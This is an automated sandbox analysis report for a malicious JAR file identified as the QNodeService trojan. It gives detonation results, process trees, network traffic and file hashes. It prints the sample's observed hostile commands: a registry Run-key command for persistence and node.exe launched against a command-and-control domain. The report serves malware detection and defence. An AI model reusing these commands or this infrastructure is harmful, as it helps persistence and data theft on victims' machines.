Malware Analysis Report

2024-10-19 10:30

Sample ID 201005-v3f4zxbrka
Target 2b5e8601ebef2e9c3b82bfc71f4d9c60.jar
SHA256 eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1
Tags
persistence trojan qnodeservice spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1

Threat Level: Known bad

The file 2b5e8601ebef2e9c3b82bfc71f4d9c60.jar was found to be: Known bad.

Malicious Activity Summary

persistence trojan qnodeservice spyware

QNodeService

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Adds Run key to start application

JavaScript code in executable

Looks up external IP address via web service

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2020-10-05 13:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2020-10-05 13:15

Reported

2020-10-05 13:17

Platform

win7v200722

Max time kernel

9s

Max time network

15s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

Signatures

N/A

Processes

C:\Windows\system32\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2020-10-05 13:15

Reported

2020-10-05 13:17

Platform

win10v200722

Max time kernel

106s

Max time network

135s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

Signatures

QNodeService

trojan qnodeservice

Reads user/profile data of web browsers

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\fc82d951-8a6d-40f7-8c5e-ade60e7d5946 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" C:\Windows\system32\reg.exe N/A

JavaScript code in executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A wtfismyip.com N/A N/A
N/A wtfismyip.com N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3816 wrote to memory of 3376 N/A C:\ProgramData\Oracle\Java\javapath\java.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3816 wrote to memory of 3376 N/A C:\ProgramData\Oracle\Java\javapath\java.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3376 wrote to memory of 3688 N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3376 wrote to memory of 3688 N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3688 wrote to memory of 2792 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3688 wrote to memory of 2792 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 2792 wrote to memory of 3036 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 2792 wrote to memory of 3036 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3036 wrote to memory of 3616 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 3616 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Windows\system32\cmd.exe
PID 3616 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3616 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\ProgramData\Oracle\Java\javapath\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\5aae1218.tmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain qwertyhills92.spdns.org

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js --hub-domain qwertyhills92.spdns.org

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js --hub-domain qwertyhills92.spdns.org

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fc82d951-8a6d-40f7-8c5e-ade60e7d5946" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""

C:\Windows\system32\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fc82d951-8a6d-40f7-8c5e-ade60e7d5946" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 nodejs.org udp
N/A 104.20.22.46:443 nodejs.org tcp
N/A 8.8.8.8:53 qwertyhills92.spdns.org udp
N/A 79.110.52.145:443 qwertyhills92.spdns.org tcp
N/A 79.110.52.145:443 qwertyhills92.spdns.org tcp
N/A 79.110.52.145:443 qwertyhills92.spdns.org tcp
N/A 79.110.52.145:443 qwertyhills92.spdns.org tcp
N/A 8.8.8.8:53 wtfismyip.com udp
N/A 95.217.228.176:443 wtfismyip.com tcp

Files

memory/3376-51-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5aae1218.tmp

MD5 2b5e8601ebef2e9c3b82bfc71f4d9c60
SHA1 678237fe0071f9ee54c756d71f2e2fc655a27c60
SHA256 eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1
SHA512 2db0e8586843c48a4cabfbac44d522f9ad94ec55c0d721b3faa5856a4d68e118105d5a3b3800ebe55b1b61913a24601595aa05de266099d19e3ee0656cc45a10

C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3688-167-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3688-171-0x00000256FF940000-0x00000256FF941000-memory.dmp

memory/2792-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/2792-174-0x0000034BD4B00000-0x0000034BD4B01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js

MD5 c686d5fcf94d07f7cee70109eba9c4d3
SHA1 588eee04fdbf1fa372c8389c66d581e0b37afd7e
SHA256 e7e4897c0bbcd7e2931011f7839a0ebe920dc14e116fb898fc5e318827dc425d
SHA512 5af3b52daafe41bf891dcd846c3b8c15c04d1da2cdb28c915cf970f2fbe3d7bba6b6fc7c291a431a2d0a437f159322401eb8aa567a146763d665ca76677853a3

memory/3036-176-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3036-178-0x000001AF91C00000-0x000001AF91C01000-memory.dmp

memory/3616-179-0x0000000000000000-mapping.dmp

memory/3700-180-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\3036-66084817d3b82bee.node

MD5 2e20508eac344dfead52bdc25b73a7fb
SHA1 c2918d63d3c0f14dce0552530ef0793f3a76bfa7
SHA256 500e8c83a3d455c26d20fb32e02c26a47a6c7fa906ce2c0491729b731906ac98
SHA512 25f8c95eb38a39e7ea60145e598f8e00b3b4c61f9ef6ae1689d3be16da7bd7c0d57a55d0d06a8402af694be880408ca6ef01829b79d9768d09967db5e3a2b8de

\Users\Admin\AppData\Local\Temp\3036-78babbdd958fedd1.node

MD5 df45601340083518d8bcc10ec848460b
SHA1 8613d6ab3040d57d241ed4a466c1fffb1b12455b
SHA256 eebfd03defaa0965393ebde5cd45a982dda75c82d5205a702f88deec660723ed
SHA512 0e1e14dd82119dc822dccc4da4d64cce62a7796ec1157defa97b4bc29d767d164e6ef65861448b24c4972cc3919bf1583518ba725757c0f96af47a942380cd41

\Users\Admin\AppData\Local\Temp\3036-0f142030f8b3a34f.node

MD5 4e2dd4f7e4bddd4d772390d91bb80b4e
SHA1 d664d431a5efd2df79c6a0c80b46924ff143c92a
SHA256 5ac59bf615e2cbfea38b0f68d82cbb47e729af688960b4334895030572553367
SHA512 c01f221b80e2d3f03c5fa1862814734d2cca7e742b248a97dbb8958fe93b54369924b3968f600938df8bd0a41c33cd41e229198fafcbd65ea67940e707be05da

\Users\Admin\AppData\Local\Temp\3036-19b5bb8f5a24d742.node

MD5 ee6e80bab410c751c935e6175acf8b5c
SHA1 c44cad6425db5c9c86351f9f9f7b019b876db528
SHA256 dd3bd6107fb87be3c34985df2a8a0645fa7a89172d23ddb66fec64c3236a1af3
SHA512 c654c44cfe115a9c4f9eaf6ed4207511c17dc4eeb00441c2be6413d0a16c348fce0dcf282f2b9132948150e3541d248edd62b2e055a1cd902f80b9a67d2e1d77

\Users\Admin\AppData\Local\Temp\3036-e75094ceb677a8b5.node

MD5 87f2661da9a09dc36a1e39b53692e172
SHA1 fc6a37bfcd72d7d70a3afb6fbd752bf1e0b0990f
SHA256 7d2532530cd09d589348e1d6c2a46af4d3de73ee72941a4ee5b65cd21c17ddea
SHA512 7187b2761245b470f4dbdbaa258e8d3cc1f2491bea2f7649212d8abcef1ccfb4c4b7fe4d0a37ca47840dd21eea9d799c94367af43c98027ba6f1247162a9e713

\Users\Admin\AppData\Local\Temp\3036-33c9a6e061a3d471.node

MD5 f1c9cde23537dc338fb765f2c125f994
SHA1 6f290977d6e0666c4798b4bc17f640a18598a772
SHA256 8f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b
SHA512 1bbdd3e50d4bcd09ca8e107596497ff3b20d82d728d485ca6eb1ee8660de0c3f4fe24dcc1657f2f59bc4f99fa2ddd525a0446eaed7999ed23b34fe8963750307